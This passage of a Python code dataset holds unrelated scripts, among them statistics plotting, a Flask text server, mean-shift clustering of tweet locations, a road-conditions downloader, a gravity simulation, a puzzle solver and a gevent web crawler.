norm.pdf(pdfstd1_xinf, theta, math.sqrt(var_std))\npdfstd1_xsup = np.linspace(theta+epsilon1, xmax, 50)\npdfstd1_sup = norm.pdf(pdfstd1_xsup, theta, math.sqrt(var_std))\npdfstd2_xinf = np.linspace(xmin, theta-epsilon2, 50)\npdfstd2_inf = norm.pdf(pdfstd2_xinf, theta, math.sqrt(var_std))\npdfstd2_xsup = np.linspace(theta+epsilon2, xmax, 50)\npdfstd2_sup = norm.pdf(pdfstd2_xsup, theta, math.sqrt(var_std))\n\n\n# length of the ticks for all subplot (6 pixels)\ndisplay_length = 6 # in pixels\n# x ticks labels margin\nxtm = -0.09\nytm = 0.4\n# font size\nfontsize = 14\n# colors from coolwarm\ncNorm = colors.Normalize(vmin=0, vmax=1)\nscalarMap = cm.ScalarMappable(norm=cNorm, cmap=cm.coolwarm)\ncol10 = scalarMap.to_rgba(0)\ncol20 = scalarMap.to_rgba(1)\n\nfig = plt.figure(0, figsize=(10, 6), frameon=False)\n\n# PLOT OF F(x | x < a)\nax = plt.subplot2grid((2, 8), (0, 0), rowspan=1, colspan=4)\n\nplt.xlim(xmin_ax, xmax_ax)\nplt.ylim(ymin_ax, ymax_ax)\n\n# horizontal and vertical ticks length\nxtl, ytl = convert_display_to_data_coordinates(ax.transData, length=display_length)\n\n# axis arrows\nplt.annotate(\"\", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\nplt.annotate(\"\", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\n\nplt.plot(x, pdf_var1, color='k', linewidth=2)\n\n# filled areas\nax.fill_between(pdf1_xinf, 0, pdf1_inf, color=col10)\nax.fill_between(pdf1_xsup, 0, pdf1_sup, color=col10)\n\n# xlabels and xtickslabels\nplt.plot([theta, theta], [0, xtl], 'k')\nplt.plot([theta-epsilon, theta-epsilon], [0, xtl], 'k')\nplt.plot([theta+epsilon, theta+epsilon], [0, xtl], 'k')\nplt.text(theta, xtm, '$\\\\theta$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta-epsilon, xtm, '$\\\\theta-\\epsilon$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta+epsilon, xtm, '$\\\\theta+\\epsilon$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(xmax_ax, xtm, '$\\hat{\\\\theta}$', fontsize=fontsize, ha='right', va='baseline')\nplt.text(ytm, ymax_ax, '$p(\\hat{\\\\theta})=\\mathcal{N}(\\\\theta,\\,\\sigma^2_{\\hat{\\\\theta}})$',\n fontsize=fontsize, ha='left', va='center')\n\n\nplt.text(xmax_ax+0.4, ymax_ax, '$\\sigma^2_{\\hat{\\\\theta}}<\\sigma^2_{\\check{\\\\theta}}$',\n fontsize=fontsize, ha='center', va='center')\n\nplt.axis('off')\n\n\n##\nax = plt.subplot2grid((2, 8), (0, 4), rowspan=1, colspan=4)\n\nplt.xlim(xmin_ax, xmax_ax)\nplt.ylim(ymin_ax, ymax_ax)\n\n# axis arrows\nplt.annotate(\"\", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\nplt.annotate(\"\", xytext=(theta, ymin_ax), xycoords='data', xy=(theta, ymax_ax), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\n\nplt.plot(x, pdf_std, color='k', linewidth=2)\n\n# filled areas\nax.fill_between(pdfstd1_xinf, 0, pdfstd1_inf, color=col10)\nax.fill_between(pdfstd1_xsup, 0, pdfstd1_sup, color=col10)\n\nxtm2 = -0.11\n# xlabels and xtickslabels\nplt.plot([theta-epsilon1, theta-epsilon1], [0, xtl], 'k')\nplt.plot([theta+epsilon1, theta+epsilon1], [0, xtl], 'k')\n# plt.text(theta-epsilon1, xtm, '$$-\\epsilon/\\sqrt{\\\\textrm{var}(\\hat{\\\\theta})}$$',\n# fontsize=fontsize, ha='center', va='baseline')\n# plt.text(theta-epsilon1, xtm, '$$-\\\\frac{\\epsilon}{\\sigma_{\\hat{\\\\theta}}}$$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta-epsilon1, xtm2, '$-\\epsilon/\\sigma_{\\hat{\\\\theta}}$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta+epsilon1, xtm2, '$\\epsilon/\\sigma_{\\hat{\\\\theta}}$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(xmax_ax, xtm2, '$(\\hat{\\\\theta}-\\\\theta$)/\\sigma_{\\hat{\\\\theta}}',\n fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta + ytm, ymax_ax, '$p((\\hat{\\\\theta}-\\\\theta$)/\\sigma_{\\hat{\\\\theta}})=\\mathcal{N}(0,\\,1)$',\n fontsize=fontsize, ha='left', va='center')\nplt.axis('off')\n\n\n#########################\n#########################\n\nax = plt.subplot2grid((2, 8), (1, 0), rowspan=1, colspan=4)\n\nplt.xlim(xmin_ax, xmax_ax)\nplt.ylim(ymin_ax, ymax_ax)\n\n# axis arrows\nplt.annotate(\"\", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\nplt.annotate(\"\", xytext=(0, ymin_ax), xycoords='data', xy=(0, ymax_ax), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\n\nplt.plot(x, pdf_var2, color='k', linewidth=2)\n\n# filled areas\nax.fill_between(pdf2_xinf, 0, pdf2_inf, color=col10)\nax.fill_between(pdf2_xsup, 0, pdf2_sup, color=col10)\n\n# xlabels and xtickslabels\nplt.plot([theta, theta], [0, xtl], 'k')\nplt.plot([theta-epsilon, theta-epsilon], [0, xtl], 'k')\nplt.plot([theta+epsilon, theta+epsilon], [0, xtl], 'k')\nplt.text(theta, xtm, '$\\\\theta$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta-epsilon, xtm, '$\\\\theta-\\epsilon$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta+epsilon, xtm, '$\\\\theta+\\epsilon$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(xmax_ax, xtm, '$\\check{\\\\theta}$', fontsize=fontsize, ha='right', va='baseline')\nplt.text(ytm, ymax_ax, '$p(\\check{\\\\theta})=\\mathcal{N}(\\\\theta,\\,\\sigma^2_{\\check{\\\\theta}})$',\n fontsize=fontsize, ha='left', va='center')\nplt.axis('off')\n\n##\nax = plt.subplot2grid((2, 8), (1, 4), rowspan=1, colspan=4)\n\nplt.xlim(xmin_ax, xmax_ax)\nplt.ylim(ymin_ax, ymax_ax)\n\n# axis arrows\nplt.annotate(\"\", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\nplt.annotate(\"\", xytext=(theta, ymin_ax), xycoords='data', xy=(theta, ymax_ax), textcoords='data',\n arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002))\n\nplt.plot(x, pdf_std, color='k', linewidth=2)\n\n# filled areas\nax.fill_between(pdfstd2_xinf, 0, pdfstd2_inf, color=col10)\nax.fill_between(pdfstd2_xsup, 0, pdfstd2_sup, color=col10)\n\nxtm2 = -0.11\n# xlabels and xtickslabels\nplt.plot([theta-epsilon2, theta-epsilon2], [0, xtl], 'k')\nplt.plot([theta+epsilon2, theta+epsilon2], [0, xtl], 'k')\nplt.text(theta-epsilon2, xtm2, '$-\\epsilon/\\sigma_{\\check{\\\\theta}}$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta+epsilon2, xtm2, '$\\epsilon/\\sigma_{\\check{\\\\theta}}$', fontsize=fontsize, ha='center', va='baseline')\nplt.text(xmax_ax, xtm2, '$(\\check{\\\\theta}-\\\\theta$)/\\sigma_{\\check{\\\\theta}}',\n fontsize=fontsize, ha='center', va='baseline')\nplt.text(theta + ytm, ymax_ax, '$p((\\check{\\\\theta}-\\\\theta$)/\\sigma_{\\check{\\\\theta}})=\\mathcal{N}(0,\\,1)$',\n fontsize=fontsize, ha='left', va='center')\nplt.axis('off')\n\n\n# save as pdf image\nplt.savefig('problem_2_7.pdf', bbox_inches='tight')\n\nplt.show()\n\n","sub_path":"figuras/PycharmKayStatisticalReport/problem_2_7.py","file_name":"problem_2_7.py","file_ext":"py","file_size_in_byte":9522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"402047582","text":"from flask import Flask, request, send_from_directory\nimport towels\napp = Flask(__name__)\n\n@app.route('/', defaults={'path': 'index.html'})\n@app.route('//')\ndef index(path):\n return send_from_directory('pages', path)\n\n@app.route('/gen/', defaults={'num': 3, 'corpus': 'full'})\n@app.route('/gen//', defaults={'corpus': 'full'})\n@app.route('/gen///')\ndef generate(num, corpus):\n if num > 42:\n return 'Sentence limit exceeded.'\n return towels.generate(num, corpus)\n\n@app.route('/gen/s/', defaults={'char': 140, 'corpus': 'full'})\n@app.route('/gen/s//', defaults={'corpus': 'full'})\n@app.route('/gen/s///')\ndef generate_sentence(char, corpus):\n if char > 420:\n return 'Character limit exceeded.'\n sentence = towels.generate_sentence(char, corpus)\n if sentence is None:\n return ''\n return sentence\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=22109)\n\n","sub_path":"webserv.py","file_name":"webserv.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"594464271","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/jeju/executor/editor.py\n# Compiled at: 2016-11-09 20:33:52\nimport string, ConfigParser, io, logging\n\ndef replaceable(code, kv):\n keys = kv.keys()\n for key in keys:\n nkey = '${%s}' % key\n code = string.replace(code, nkey, kv[key])\n\n logging.debug('####################' + '\\n%s' % code)\n logging.debug('####################')\n return code\n\n\ndef find_file_path(lookahead):\n if lookahead == None:\n return\n else:\n ctx = lookahead['text']\n items = ctx.split()\n if items[0] == 'edit':\n return items[1]\n return\n\n\ndef editor_text(**kwargs):\n lookahead = kwargs['lookahead']\n code = kwargs['code']\n kv = kwargs['kv']\n file_path = find_file_path(kwargs['lookahead'])\n if file_path == None:\n msg = 'Cannot find content:%s' % lookahead['text']\n logging.error(msg)\n return msg\n else:\n fp = open(file_path, 'w')\n rcode = replaceable(code, kv)\n fp.write(rcode)\n fp.close()\n return {'output': rcode}\n\n\ndef editor_ini(**kwargs):\n lookahead = kwargs['lookahead']\n code = kwargs['code']\n kv = kwargs['kv']\n added = ConfigParser.RawConfigParser(allow_no_value=True)\n rcode = replaceable(code, kv)\n added.readfp(io.BytesIO(rcode))\n file_path = find_file_path(kwargs['lookahead'])\n if file_path == None:\n msg = 'Cannot find content path: %s' % lookahead['text']\n logging.error(msg)\n return msg\n else:\n orig = ConfigParser.ConfigParser()\n orig.readfp(open(file_path))\n for section in added.sections():\n if orig.has_section(section) == False:\n msg = 'Add new section'\n logging.debug(msg)\n orig.add_section(section)\n for item, value in added.items(section):\n if item == '...':\n msg = 'abbreviation'\n else:\n orig.set(section, item, value)\n\n fp = open(file_path, 'w')\n orig.write(fp)\n new_content = orig.readfp(open(file_path))\n fp.close()\n return {'output': new_content}","sub_path":"pycfiles/jeju-0.3.6-5.linux-x86_64.tar/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"581111198","text":"from environment import spark\nfrom pyspark.ml.feature import Word2Vec\n\ndocumentDF = spark.createDataFrame([\n (\"Hi I heard about Spark\".split(\" \"), ),\n (\"I wish Java could use case classes\".split(\" \"), ),\n (\"Logistic regression models are neat\".split(\" \"), )\n], [\"text\"])\n\nword2Vec = Word2Vec(vectorSize=3, minCount=0, inputCol=\"text\", outputCol=\"result\")\nmodel = word2Vec.fit(documentDF)\n\nresult = model.transform(documentDF)\nresult.show(truncate=False)\n","sub_path":"basic-mllib/Word2Vec_/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"86314463","text":"# coding: utf-8\n\n# Usage\n# reduce_jsons_4_trajectories.pyで生成されたファイルから、点群を抜き出し、ミーンシフト法によって、\n# クラスタリングをし、各クラスタの収束点を出力する。\n# 第1引数で平均を取る半径の長さをメートルで指定。第2引数で収束条件距離を指定。\n# python3 src/mean_shift/mean_shift.py 100.0 10.0\n\nimport json\nimport sys\nimport glob\nimport calendar\nimport datetime\nimport os\nimport math\n\nparam = sys.argv\ncurrent_time = datetime.datetime.today()\n\nradius_of_mean = float(param[1])\nradius_of_convergence = float(param[2])\n\ndirectory_path = 'result/mean_shift/result_' + str(current_time.year) + '_' + str(current_time.month) + '_' + str(current_time.day) + '_' + str(current_time.hour) + '_' + str(current_time.minute)\nfw_points_path = directory_path + '/points.json'\nfw_groups_path = directory_path + '/groups.json'\nfr_reduced_path = 'data/mean_shift/reduced_jsons/reduced.json'\n\ndef latlngToDistance(lat1, lng1, lat2, lng2):\n\t# 定数 ( GRS80 ( 世界測地系 ) )\n\tGRS80_R_X = 6378137.000000 # 赤道半径\n\tGRS80_R_Y = 6356752.314140 # 極半径\n\tr_x = GRS80_R_X\n\tr_y = GRS80_R_Y\n\tdif_lat = math.pi * (lat1 - lat2) / 180.0\n\tdif_lng = math.pi * (lng1 - lng2) / 180.0\n\tmean_lat = math.pi * (lat1 + lat2) / 180.0 / 2.0\n\teccentricity = math.sqrt(( r_x ** 2 - r_y ** 2 ) / ( r_x ** 2 ))\n\tw = math.sqrt(1.0 - (eccentricity ** 2) * (math.sin(mean_lat) ** 2))\n\tm = r_x * ( 1.0 - eccentricity ** 2 ) / ( w ** 3 )\n\tn = r_x / w\n\td = math.sqrt((dif_lng * m) ** 2 + (dif_lat * n * math.cos(mean_lat)) ** 2)\n\treturn d\n\ndef decideNextPoint(this_point):\n\tmean_lat = 0.0\n\tmean_lng = 0.0\n\tsum_lat = 0.0\n\tsum_lng = 0.0\n\tnum_elements = 0.0\n\tglobal is_convergent\n\tfor point in points:\n\t\tdistance_between_2_points = latlngToDistance(this_point[\"present_point\"][\"lat\"], this_point[\"present_point\"][\"lng\"], point[\"present_point\"][\"lat\"], point[\"present_point\"][\"lng\"])\n\t\tif not distance_between_2_points <= radius_of_mean:\n\t\t\tcontinue\n\t\tnum_elements += 1.0\n\t\tsum_lat += point[\"present_point\"][\"lat\"]\n\t\tsum_lng += point[\"present_point\"][\"lng\"]\n\t\tif not distance_between_2_points <= radius_of_convergence:\n\t\t\tis_convergent = False\n\tmean_lat = sum_lat / num_elements\n\tmean_lng = sum_lng / num_elements\n\tthis_point[\"next_point\"][\"lat\"] = mean_lat\n\tthis_point[\"next_point\"][\"lng\"] = mean_lng\n\treturn this_point\n\ndef updatePoint(this_point):\n\tthis_point[\"present_point\"][\"lat\"] = this_point[\"next_point\"][\"lat\"]\n\tthis_point[\"present_point\"][\"lng\"] = this_point[\"next_point\"][\"lng\"]\n\treturn this_point\n\ndef decideGroupID():\n\tglobal points\n\tcurrent_group_id = 0\n\tfor pointA in points:\n\t\tif \"group_id\" in pointA:\n\t\t\tcontinue\n\t\tpointA[\"group_id\"] = current_group_id\n\t\tcurrent_group_id += 1\n\t\tfor pointB in points:\n\t\t\tif \"group_id\" in pointB:\n\t\t\t\tcontinue\n\t\t\tdistance_between_2_points = latlngToDistance(pointA[\"present_point\"][\"lat\"], pointA[\"present_point\"][\"lng\"], pointB[\"present_point\"][\"lat\"], pointB[\"present_point\"][\"lng\"])\n\t\t\tif distance_between_2_points <= radius_of_convergence:\n\t\t\t\tpointB[\"group_id\"] = pointA[\"group_id\"]\n\tnum_group = current_group_id\n\treturn num_group\n\ndef decideMeansOfEachGroup():\n\tmeans_of_each_group = []\n\tfor i in range(num_group):\n\t\tmean_point = {\"group_id\": i ,\"lat\": 0.0, \"lng\": 0.0, \"num_points\": 0}\n\t\tfor point in points:\n\t\t\tif point[\"group_id\"] == i:\n\t\t\t\tmean_point[\"lat\"] += point[\"present_point\"][\"lat\"]\n\t\t\t\tmean_point[\"lng\"] += point[\"present_point\"][\"lng\"]\n\t\t\t\tmean_point[\"num_points\"] += 1\n\t\tmean_point[\"lat\"] = mean_point[\"lat\"] / mean_point[\"num_points\"]\n\t\tmean_point[\"lng\"] = mean_point[\"lng\"] / mean_point[\"num_points\"]\n\t\tmeans_of_each_group.append(mean_point)\n\treturn means_of_each_group\n\n\nprint(\"reading file\")\nprint(str(datetime.datetime.today()))\n\nfr_reduced = open(fr_reduced_path,'r')\npoints = []\nfor line in fr_reduced:\n\ttweet = json.loads(line)\n\tpoints.append({\"tweet_id\": tweet[\"tweet_id\"], \"present_point\": {\"lat\": float(tweet[\"coordinates\"][1]), \"lng\": float(tweet[\"coordinates\"][0])}, \"next_point\": {\"lat\": 0.0, \"lng\": 0.0}})\n\n\nprint(\"doing mean-shift\")\nprint(str(datetime.datetime.today()))\n\nis_convergent = False\nwhile(is_convergent == False):\n\tis_convergent = True\n\tfor i, point in enumerate(points):\n\t\tpoints[i] = decideNextPoint(point)\n\tfor i, point in enumerate(points):\n\t\tpoints[i] = updatePoint(point)\n\tprint(str(datetime.datetime.today()))\n\n\nprint(\"deciding the group of each point\")\nprint(str(datetime.datetime.today()))\n\t\t\nnum_group = decideGroupID()\n\n\nprint(\"deciding the mean point of each group\")\nprint(str(datetime.datetime.today()))\n\nmeans_of_each_group = decideMeansOfEachGroup()\n\n\nprint(\"outputting\")\nprint(str(datetime.datetime.today()))\n\nos.mkdir(directory_path)\n\nfr_reduced = open('data/mean_shift/reduced_jsons/reduced.json','r')\nfor i,line in enumerate(fr_reduced):\n\ttweet = json.loads(line)\n\ttweet.update({\"group_id\": points[i][\"group_id\"]})\n\tfw = open(fw_points_path, 'a')\n\tfw.write(json.dumps(tweet))\n\tfw.write('\\n')\n\tfw.close\n\nfor mean in means_of_each_group:\n\tfw = open(fw_groups_path, 'a')\n\tfw.write(json.dumps(mean))\n\tfw.write('\\n')\n\tfw.close\n\n","sub_path":"src/mean_shift/mean_shift.py","file_name":"mean_shift.py","file_ext":"py","file_size_in_byte":5113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206145365","text":"def decodificar(mensaje):\n linea=mensaje.split(\",\")\n palabra=\"\"\n n=0\n\n for i in linea:\n n=decimal(i)\n palabra+=chr(n)\n\n return palabra\n\ndef decimal(n):\n n=int(n,2)\n return n\n\n\nif __name__ == \"__main__\":\n mensaje=decodificar(\"01101000,01101111,01101100,01100001\")\n print(mensaje)\n","sub_path":"tema9_ej3/tema9_ej3_1563468J.py","file_name":"tema9_ej3_1563468J.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"644081935","text":"\n\n# Iowa Road Conditions processing script\n# daryl herzmann akrherz@iastate.edu 19 Nov 2009\n# installed by Shane Searcy, ITO DMX, shane.searcy@noaa.gov\n#\n# REQUIRES: the 'mx' package installed (standard yum install mx)\n#\n# 1) Download file from website\n# 2) Compare with old file to see if they are any different\n# IF DIFFERENT\n# 3) Replace Headers with NWS mandated stuff\n# 4) Write file to hard drive\n# 5) scp file to ls1-dmx:/data/Incoming for dissemination\n\nHTTP_SRC = \"http://ia.carsprogram.org/IAcarssegment/IA_road_conditions.txt\"\n#FINAL_LOCATION = \"/data/Incoming/WAN_NWWSDSMSTOIA.dat\"\nFINAL_LOCATION = \"/tmp/LOC_DSMSTOIA.dat\"\nLOG_FILENAME = \"/tmp/STOIA_acquisition.log\"\nPREV_PRODUCT = \"/tmp/prevSTOIA.txt\"\n\nimport urllib2, logging, traceback, sys, os, tempfile, StringIO\nimport datetime\nLOGFORMAT = \"%(asctime)-15s:: %(message)s\"\nlogging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG,\n format=LOGFORMAT)\n\ndef compare_product( newdata ):\n \"\"\"\n Compares newly downloaded data with previously saved version\n @return boolean if the data is new!\n \"\"\"\n if not os.path.isfile( PREV_PRODUCT ):\n logging.debug(\"Previous datafile %s not found\" % (PREV_PRODUCT,))\n return True\n\n # Always send the 3:01 a.m. report\n now = datetime.datetime.now()\n if now.minute == 1 and now.hour == 3:\n return True\n\n # Make sure the product is complete...\n if newdata.find(\"800-762-3947\") == -1:\n return False\n\n olddata = open( PREV_PRODUCT, 'r').read()\n if olddata != newdata:\n logging.debug(\"Datafile is new!\")\n return True\n\n return False\n\ndef ship2ldad( data ):\n \"\"\"\n Writes the data to a file for LDAD to then deal with\n \"\"\"\n f = open (\"/tmp/pre_ldad_STOIA.txt\", 'w')\n f.write( data )\n f.close()\n\n\n logging.debug(\"Shipping %s product to LDAD via scp\" % (f.name,) )\n os.system(\"cp %s %s\" % (f.name, FINAL_LOCATION) )\n os.system(\"python /home/ldm/pyWWA/util/make_text_noaaportish.py %s\" % (FINAL_LOCATION,))\n os.system(\"cat %s | python /home/ldm/pyWWA/parsers/stoia_parser.py\" % (FINAL_LOCATION,))\n\ndef fix_header( data ):\n \"\"\"\n Fixes the header the file has to make NWS protocols\n @return String fixed file\n \"\"\"\n # Formulate the new header\n now = datetime.datetime.now()\n utcnow = datetime.datetime.utcnow()\n newdata = \"\"\"000\nSXUS43 KDMX %s\nSTOIA\n\nIOWA ROAD CONDITIONS\nIOWA DEPARTMENT OF PUBLIC SAFETY\nRELAYED BY THE NATIONAL WEATHER SERVICE DES MOINES IA\n%s\n\n\"\"\" % (utcnow.strftime(\"%d%H%M\"), (now.strftime(\"%-I%M %p CST %a %b %d %Y\").upper()),)\n\n # Strip off everything before the first *\n return newdata + data[data.find(\"*\"):]\n return newdata + data \n \ndef save_data( data ):\n \"\"\"\n Save the data in a file for future comparisons\n \"\"\"\n f = open( PREV_PRODUCT , 'w')\n f.write( data )\n f.close()\n logging.debug(\"Saved downloaded data to %s\" % (PREV_PRODUCT,))\n\nlogging.debug(\"_______________ Starting download\")\ntry:\n data = urllib2.urlopen( HTTP_SRC ).read()\n data = data[data.find(\"*\"):]\n\nexcept:\n logging.error(\"Download Failure!, Abort\")\n ebuf = StringIO.StringIO()\n traceback.print_exc(file=ebuf)\n ebuf.seek(0)\n logging.error( ebuf.read() )\n logging.debug(\"__ END\")\n sys.exit()\n\nlogging.debug(\"Downloaded %s bytes\" % (len(data),))\n\nisnew = compare_product( data )\n\nsave_data(data)\n\nif isnew:\n data = fix_header( data )\n ship2ldad( data )\n\nlogging.debug(\"__ END\")\n","sub_path":"scripts/roads/stoia.py","file_name":"stoia.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"162443644","text":"def remove_files(file_names):\n \"\"\" removes files \"\"\"\n\n import os, glob\n\n list_files= glob.glob(file_names + '*')\n\n try:\n for f in list_files:\n os.remove(f)\n print('FILES REMOVED')\n except:\n print('FAIL TO REMOVE FILES')\n\n\ndef save_it(data, file_name):\n \"\"\" save list: data, filename \"\"\"\n\n def timeStamped(fname, fmt='{fname}_%Y-%m-%d-%H%M%S.txt'):\n import datetime\n return datetime.datetime.now().strftime(fmt).format(fname=fname)\n\n try:\n with open(timeStamped(file_name), \"w\") as f:\n f.write('\\n'.join(str(line) for line in data))\n\n print(\"DATA SAVED\")\n\n except:\n print(\"FAIL TO SAVE DATA\")\n\n\ndef load_it(file_name):\n\n try:\n with open(file_name, 'r') as f:\n data = f.read()\n except:\n print(\"FAIL to READ DATA!\")\n\n data_list = [number for number in data.split(\"\\n\")]\n print(file_name, \"LOADED \")\n return(data_list)\n","sub_path":"p51/_tools.py","file_name":"_tools.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"497406350","text":"import numpy as np\n\nimport time\nimport util as u\n\n# simulation parameters\ndt = 0.1 # time step\nT = 3000 # number of time steps\n\n# parameters of the system\ngamma = .00002 # gravitational coefficient\nm1 = 300 # mass of the first planet\nm2 = 1 # mass of the second planet\n\n# initial conditions: state of the system in the first two time steps\nx0 = np.array([0, 0, 1, 0])\nx1 = np.array([0, 0, 1, 0.005])\n\n# initializing the vector of system states\nxs = [x0, x1]\n\n# defining the function that calculates the forces acting on the planets at a time step\ndef F(x):\n r1 = x[:2] # position of the first planet\n r2 = x[2:4] # position of the second planet\n \n posdiff_vec = r2 - r1 # vector of difference of the positions\n dist = np.linalg.norm(posdiff_vec) # distance between the planets\n \n # Newton's law of universal gravitation\n F1 = gamma * m2 * posdiff_vec / (dist**2) # force acting on the first planet\n F2 = - gamma * m1 * posdiff_vec / (dist**2) # force acting on the second planet\n \n return np.concatenate([F1, F2], axis=0)\n\n\nfor i in range(T):\n # getting previous values of the iteration\n Lx = xs[-1]\n LLx = xs[-2]\n \n # approximating the second derivative with finite differences\n F_prev = F(Lx) # force acting at the previous time step\n x = dt**2*F_prev + 2*Lx - LLx # estimated position at the next time step\n \n xs.append(x)\n\n####################################################\n\nx, y = np.split(np.array(xs), 2, axis=1)\n\nu.plotAnim(x, y, T, isSaveVideo=False)\n\n# this is slow and not working properly\n#u.plotScatter(x, y)\n","sub_path":"planets/planets.py","file_name":"planets.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"301685895","text":"'''\r\nhttps://adventofcode.com/2020/day/7\r\n'''\r\nwith open(\"input.txt\") as f:\r\n line = f.readline()\r\n inputs = {}\r\n while line:\r\n if line.split():\r\n # set the parent bag color as the KEY and the colors it holds (VALUE) as an array\r\n parentBag = ' '.join(line.split()[:3]).replace(\"bags\", \"\")\r\n childrenBags = []\r\n innerBags = ' '.join(line.split()[4:])\r\n # we don't care HOW MANY of each bag it can hold, so we filter that out\r\n for i in innerBags.split(\", \"):\r\n # append the filtered result to childrenBags array\r\n childrenBags.append(' '.join(i.split()[1:-1]))\r\n inputs[parentBag.strip()] = childrenBags\r\n line = f.readline()\r\n#print(json.dumps(inputs, indent=2))\r\n\r\n\r\ndef numBags(color):\r\n '''\r\n I had a tough time with this one, so after hours of trying, I decided to seek help online\r\n THIS CODE LOGIC CAME FROM https://www.youtube.com/watch?v=7IOd7wvxDX0\r\n Highly recommend watching. He explains it really well :)\r\n '''\r\n containsColor = [] # keeps track of the bags that hold the specified color\r\n for k, v in inputs.items():\r\n # check to see if the colors are in the value arrays\r\n for el in v:\r\n if color == el:\r\n # if it is, append it to containsColor array\r\n containsColor.append(k)\r\n checkedColors = []\r\n if len(containsColor) == 0:\r\n return []\r\n else:\r\n for color in containsColor:\r\n checkedColors.append(color)\r\n checkedColors += numBags(color)\r\n return set(checkedColors)\r\n\r\n\r\nprint(len(numBags(\"shiny gold\")))","sub_path":"day07/lol.py","file_name":"lol.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"653149172","text":"from gevent import monkey\n\nmonkey.patch_all()\n\n#从gevent库里导入monkey模块\n\nimport gevent\n\nimport time\n\nimport requests\n\nfrom gevent.queue import Queue\nmonkey.patch_all()\n\n#从gevent库里导入queue模块\n\n\n#monkey.patch_all()能把程序变成协作式运行,就是可以帮助程序实现异步。\n\nstart = time.time()\n\n\n\nurl_list = [\n \"https://www.kaikeba.com/\",\n \"https://www.csdn.net/\",\n \"https://www.json.cn/\",\n \"https://cn.bing.com/\",\n \"https://www.jianshu.com/\",\n \"http://www.techweb.com.cn/\",\n \"https://www.bilibili.com/\",\n \"https://www.huxiu.com/\"\n]\n\n\n\nwork = Queue()\n\n#创建队列对象,并赋值给work\n\nfor url in url_list:\n\n#遍历url_list\n\n work.put_nowait(url)\n\n #用put_nowait()函数可以把网址都放进队列里\n\n\n\ndef crawler():\n\n while not work.empty():\n\n #当队列不是空的时候,就执行下面的程序\n\n url = work.get_nowait()\n\n #用get_nowait()函数可以把队列里的网址都取出\n\n r = requests.get(url)\n\n #用requests.get()函数抓取网址\n\n print(url,work.qsize(),r.status_code)\n\n #打印网址、队列长度、抓取请求的状态码\n\n\n\ntasks_list = [ ]\n\n#创建空的任务列表\n\nfor x in range(2):\n\n#相当于创建了2个爬虫\n\n task = gevent.spawn(crawler)\n\n #用gevent.spawn()函数创建执行crawler()函数的任务\n\n tasks_list.append(task)\n\n #往任务列表添加任务。\n\ngevent.joinall(tasks_list)\n\n#用gevent.joinall方法,执行任务列表里的所有任务,就是让爬虫开始爬取网站\n\nend = time.time()\n\nprint(end-start)","sub_path":"python_optional_class/Web crawler/gevent库和Queue模块来实现多协程.py","file_name":"gevent库和Queue模块来实现多协程.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"513404785","text":"### Settings for a \"cursor tracing\" visualization. ###\r\n\r\ninput_video = \"input.mp4\" # name of a video to process\r\ndir_name = \"TEMP\" # directory name in which the frames will be extracted\r\ncursor_path = \"cursor.png\" # path to a cursor png to locate in 